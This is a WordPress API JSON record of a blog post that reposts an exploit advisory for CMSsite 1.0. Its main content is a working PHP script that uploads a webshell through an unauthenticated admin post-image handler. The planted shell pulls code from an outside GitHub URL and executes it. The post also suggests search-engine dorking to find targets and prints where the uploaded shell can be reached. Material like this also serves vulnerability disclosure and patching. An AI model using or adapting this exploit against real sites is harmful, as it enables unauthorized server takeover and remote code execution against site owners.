{"id":59142,"date":"2024-08-23T19:59:58","date_gmt":"2024-08-23T16:59:58","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180340\/cmssite10-shell.txt"},"modified":"2024-08-23T19:59:58","modified_gmt":"2024-08-23T16:59:58","slug":"cmssite-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cmssite-1-0-shell-upload\/","title":{"rendered":"CMSsite 1.0 Shell Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : CMSsite 1.0 php code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |<br \/>| # Vendor : https:\/\/github.com\/VictorAlagwu\/CMSsite\/archive\/master.zip |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking In Google Or Other Search Engine.<\/p>\n[+] This payload injects php code of your choice into a SHELL.php file. The script posts the file as post_image to admin\/posts.php?source=add_post without a session cookie and expects it under img\/ with its .php name intact, so the handler apparently enforces neither authentication nor a file-type restriction.<\/p>\n[+] Line 31<br \/>Line 40<\/p>\n[+] change the path of the script folder.<\/p>\n[+] save payload as poc.php<\/p>\n[+] usage from cmd : C:\\www\\test&gt;php 1.php 127.0.0.1<\/p>\n[+] payload : <\/p>\n<p>&lt;?php<\/p>\n<p>function file_upload($target_ip) {<br \/>$file_name = &#8220;indoushka.php&#8221;;<br \/>$webshell_payload = &#8220;&lt;?php<br \/>\\$url = &#8216;https:\/\/raw.githubusercontent.com\/indoushka\/txt\/main\/indoushka.txt&#8217;;<br \/>\\$ch = curl_init();<br \/>curl_setopt(\\$ch, CURLOPT_URL, \\$url);<br \/>curl_setopt(\\$ch, CURLOPT_RETURNTRANSFER, true);<br \/>\\$output = curl_exec(\\$ch);<br \/>curl_close(\\$ch);<br \/>if (\\$output) {<br \/>include &#8216;data:\/\/text\/plain;base64,&#8217; . 
base64_encode(\\$output);<br \/>}<br \/>?&gt;&#8221;;<\/p>\n<p>$post_fields = array(<br \/>&#8216;create_post&#8217; =&gt; &#8221;,<br \/>&#8216;post_image&#8217; =&gt; new CURLFile(&#8216;data:\/\/text\/plain;base64,&#8217; . base64_encode($webshell_payload), &#8216;application\/x-php&#8217;, $file_name),<br \/>&#8216;post_title&#8217; =&gt; &#8216;inouva&#8217;,<br \/>&#8216;post_category_id&#8217; =&gt; &#8216;123&#8217;,<br \/>&#8216;post_tags&#8217; =&gt; &#8217;99&#8217;,<br \/>&#8216;post_content&#8217; =&gt; &#8216;N0_name&#8217;,<br \/>&#8216;post_status&#8217; =&gt; &#8216;Hackers&#8217;,<br \/>&#8216;qty&#8217; =&gt; &#8216;1&#8217;<br \/>);<\/p>\n<p>echo &#8220;(+) PHP Code Injection &#8230;\\n&#8221;;<\/p>\n<p>$ch = curl_init();<br \/>curl_setopt($ch, CURLOPT_URL, &#8220;http:\/\/$target_ip\/CMSsite-master\/admin\/posts.php?source=add_post&#8221;);<br \/>curl_setopt($ch, CURLOPT_POST, 1);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<\/p>\n<p>$response = curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;(+) Shell uploaded successfully.\\n&#8221;;<br \/>echo &#8220;(+) Access the shell at: http:\/\/$target_ip\/CMSsite-master\/img\/$file_name\\n&#8221;;<br \/>}<\/p>\n<p>if ($argc != 2) {<br \/>echo &#8220;(+) Usage: php &#8221; . $argv[0] . &#8221; &lt;target ip&gt;\\n&#8221;;<br \/>echo &#8220;(+) Example: php &#8221; . $argv[0] . &#8221; 10.0.0.1\\n&#8221;;<br \/>exit(-1);<br \/>}<\/p>\n<p>$target_ip = $argv[1];<br \/>file_upload($target_ip);<\/p>\n[+] Path : http:\/\/127.0.0.1\/CMSsite-master\/img\/<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. 
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : CMSsite 1.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/github.com\/VictorAlagwu\/CMSsite\/archive\/master.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload injects php code of your &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59142","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59142"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59142\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59142"
},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}